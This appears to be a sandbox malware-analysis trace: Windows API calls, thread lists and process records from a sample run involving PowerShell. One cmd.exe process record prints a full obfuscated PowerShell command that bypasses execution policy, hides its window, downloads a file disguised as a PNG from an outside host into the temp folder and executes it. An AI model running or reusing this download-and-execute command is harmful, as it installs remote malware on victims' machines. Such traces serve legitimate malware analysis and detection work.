	[0231.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.416] VirtualQuery (in: lpAddress=0x18b5e0, lpBuffer=0x18c4a0, dwLength=0x30 | out: lpBuffer=0x18c4a0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0246.421] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0246.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.421] CoTaskMemFree (pv=0x235590) 
	[0246.429] VirtualQuery (in: lpAddress=0x18b5e0, lpBuffer=0x18c4a0, dwLength=0x30 | out: lpBuffer=0x18c4a0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0246.444] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0246.444] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.444] CoTaskMemFree (pv=0x235590) 
	[0246.447] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0246.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.447] CoTaskMemFree (pv=0x235590) 
	[0246.449] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0246.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.450] CoTaskMemFree (pv=0x235590) 
	[0246.645] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0246.645] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.645] CoTaskMemFree (pv=0x235590) 
	[0246.651] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0246.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.651] CoTaskMemFree (pv=0x235590) 
	[0246.653] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0246.653] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.653] CoTaskMemFree (pv=0x235590) 
	[0246.661] VirtualQuery (in: lpAddress=0x18b5e0, lpBuffer=0x18c4a0, dwLength=0x30 | out: lpBuffer=0x18c4a0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0246.662] VirtualQuery (in: lpAddress=0x18b5e0, lpBuffer=0x18c4a0, dwLength=0x30 | out: lpBuffer=0x18c4a0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.343] CoTaskMemFree (pv=0x235590) 
	[0252.338] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2359d0
	[0252.340] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x235ae0
	[0258.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235bf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.926] CoTaskMemFree (pv=0x235bf0) 
	[0259.238] CoTaskMemAlloc (cb=0x104) returned 0x235bf0
	[0259.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235bf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.238] CoTaskMemFree (pv=0x235bf0) 
	[0259.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.841] VirtualQuery (in: lpAddress=0x18b890, lpBuffer=0x18c750, dwLength=0x30 | out: lpBuffer=0x18c750*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0263.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.857] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d66c, lpData=0x0, lpcbData=0x18d668*=0x0 | out: lpType=0x18d66c*=0x1, lpData=0x0, lpcbData=0x18d668*=0x56) returned 0x0
	[0263.857] CoTaskMemAlloc (cb=0x5a) returned 0x1b943600
	[0263.857] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d63c, lpData=0x1b943600, lpcbData=0x18d638*=0x56 | out: lpType=0x18d63c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d638*=0x56) returned 0x0
	[0263.857] CoTaskMemFree (pv=0x1b943600) 
	[0263.857] RegCloseKey (hKey=0x368) returned 0x0
	[0263.858] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d66c, lpData=0x0, lpcbData=0x18d668*=0x0 | out: lpType=0x18d66c*=0x1, lpData=0x0, lpcbData=0x18d668*=0x56) returned 0x0
	[0263.858] CoTaskMemAlloc (cb=0x5a) returned 0x1b943600
	[0263.858] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d63c, lpData=0x1b943600, lpcbData=0x18d638*=0x56 | out: lpType=0x18d63c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d638*=0x56) returned 0x0
	[0263.858] CoTaskMemFree (pv=0x1b943600) 
	[0263.858] RegCloseKey (hKey=0x368) returned 0x0
	[0263.860] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b918af0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0263.860] CoTaskMemFree (pv=0x1b918af0) 
	[0263.860] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x18d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0263.861] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b918af0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0263.861] CoTaskMemFree (pv=0x1b918af0) 
	[0263.861] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x18d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0263.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235bf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.868] CoTaskMemFree (pv=0x235bf0) 
	[0263.870] CoTaskMemAlloc (cb=0x104) returned 0x235bf0
	[0263.870] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235bf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.870] CoTaskMemFree (pv=0x235bf0) 
	[0263.872] CoTaskMemAlloc (cb=0x104) returned 0x235bf0
	[0263.872] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235bf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.872] CoTaskMemFree (pv=0x235bf0) 
	[0264.499] CoTaskMemAlloc (cb=0x104) returned 0x235bf0
	[0264.499] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235bf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0264.499] CoTaskMemFree (pv=0x235bf0) 
	[0265.626] CoTaskMemAlloc (cb=0x104) returned 0x235bf0
	[0265.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235bf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.626] CoTaskMemFree (pv=0x235bf0) 
	[0265.632] CoTaskMemAlloc (cb=0x104) returned 0x235bf0
	[0265.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235bf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.632] CoTaskMemFree (pv=0x235bf0) 

Thread:
	id = 178
	os_tid = 0x3b4


Thread:
	id = 180
	os_tid = 0xbd8


Thread:
	id = 181
	os_tid = 0xbd0


Thread:
	id = 182
	os_tid = 0xbd4


Thread:
	id = 184
	os_tid = 0xbe8


Thread:
	id = 187
	os_tid = 0x7a4


Thread:
	id = 188
	os_tid = 0x7b0

	[0081.918] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0149.637] LocalFree (hMem=0x1e38f0) returned 0x0
	[0149.637] CloseHandle (hObject=0x324) returned 1
	[0149.637] CloseHandle (hObject=0x13) returned 1
	[0149.638] CloseHandle (hObject=0xf) returned 1
	[0149.638] RegCloseKey (hKey=0x310) returned 0x0
	[0149.681] RegCloseKey (hKey=0x30c) returned 0x0
	[0149.681] RegCloseKey (hKey=0x308) returned 0x0
	[0149.681] LocalFree (hMem=0x1e38c0) returned 0x0
	[0149.681] RegCloseKey (hKey=0x330) returned 0x0
	[0177.588] RegCloseKey (hKey=0x330) returned 0x0
	[0212.032] RegCloseKey (hKey=0x344) returned 0x0
	[0212.032] RegCloseKey (hKey=0x360) returned 0x0
	[0212.033] RegCloseKey (hKey=0x35c) returned 0x0
	[0212.033] RegCloseKey (hKey=0x358) returned 0x0
	[0212.033] RegCloseKey (hKey=0x354) returned 0x0
	[0212.033] RegCloseKey (hKey=0x350) returned 0x0
	[0212.033] RegCloseKey (hKey=0x34c) returned 0x0
	[0212.034] RegCloseKey (hKey=0x348) returned 0x0
	[0212.034] RegCloseKey (hKey=0x378) returned 0x0
	[0212.034] RegCloseKey (hKey=0x374) returned 0x0
	[0212.034] RegCloseKey (hKey=0x338) returned 0x0
	[0212.034] RegCloseKey (hKey=0x334) returned 0x0
	[0212.035] RegCloseKey (hKey=0x160) returned 0x0
	[0212.035] RegCloseKey (hKey=0x324) returned 0x0
	[0212.035] RegCloseKey (hKey=0x310) returned 0x0
	[0212.035] RegCloseKey (hKey=0x30c) returned 0x0
	[0212.036] RegCloseKey (hKey=0x308) returned 0x0
	[0212.036] RegCloseKey (hKey=0x328) returned 0x0
	[0212.036] RegCloseKey (hKey=0x320) returned 0x0
	[0212.036] RegCloseKey (hKey=0x370) returned 0x0
	[0212.036] RegCloseKey (hKey=0x36c) returned 0x0
	[0212.037] RegCloseKey (hKey=0x368) returned 0x0
	[0252.685] RegCloseKey (hKey=0x30c) returned 0x0
	[0252.685] RegCloseKey (hKey=0x308) returned 0x0
	[0252.685] RegCloseKey (hKey=0x328) returned 0x0
	[0252.685] RegCloseKey (hKey=0x320) returned 0x0
	[0252.686] RegCloseKey (hKey=0x370) returned 0x0
	[0252.686] RegCloseKey (hKey=0x364) returned 0x0
	[0252.686] RegCloseKey (hKey=0x310) returned 0x0
	[0252.686] RegCloseKey (hKey=0x368) returned 0x0

Process:
	id = "22"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x4bda7000"
	os_pid = "0xbcc"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "19"
	os_parent_pid = "0x8c0"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 186
	os_tid = 0xbdc

	[0082.197] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f8c0 | out: lpSystemTimeAsFileTime=0x20f8c0*(dwLowDateTime=0xa95b81b0, dwHighDateTime=0x1d543d1)) 
	[0082.197] GetCurrentProcessId () returned 0xbcc
	[0082.197] GetCurrentThreadId () returned 0xbdc
	[0082.197] GetTickCount () returned 0x2530e
	[0082.197] QueryPerformanceCounter (in: lpPerformanceCount=0x20f8c8 | out: lpPerformanceCount=0x20f8c8*=20662349610) returned 1
	[0082.199] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
	[0082.199] __set_app_type (_Type=0x1) 
	[0082.199] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0082.199] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0082.199] GetCurrentThreadId () returned 0xbdc
	[0082.199] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbdc) returned 0x3c
	[0082.199] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0082.200] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0082.200] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0082.200] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0082.200] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f858 | out: phkResult=0x20f858*=0x0) returned 0x2
	[0082.200] VirtualQuery (in: lpAddress=0x20f840, lpBuffer=0x20f7c0, dwLength=0x30 | out: lpBuffer=0x20f7c0*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0082.200] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f7c0, dwLength=0x30 | out: lpBuffer=0x20f7c0*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0082.200] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f7c0, dwLength=0x30 | out: lpBuffer=0x20f7c0*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0082.200] VirtualQuery (in: lpAddress=0x114000, lpBuffer=0x20f7c0, dwLength=0x30 | out: lpBuffer=0x20f7c0*(BaseAddress=0x114000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0082.200] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f7c0, dwLength=0x30 | out: lpBuffer=0x20f7c0*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0082.200] GetConsoleOutputCP () returned 0x1b5
	[0082.200] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0082.201] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0082.201] _get_osfhandle (_FileHandle=1) returned 0x7
	[0082.201] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0082.201] _get_osfhandle (_FileHandle=1) returned 0x7
	[0082.201] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0082.201] _get_osfhandle (_FileHandle=1) returned 0x7
	[0082.201] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0082.201] _get_osfhandle (_FileHandle=0) returned 0x3
	[0082.201] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
	[0082.202] _get_osfhandle (_FileHandle=0) returned 0x3
	[0082.202] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
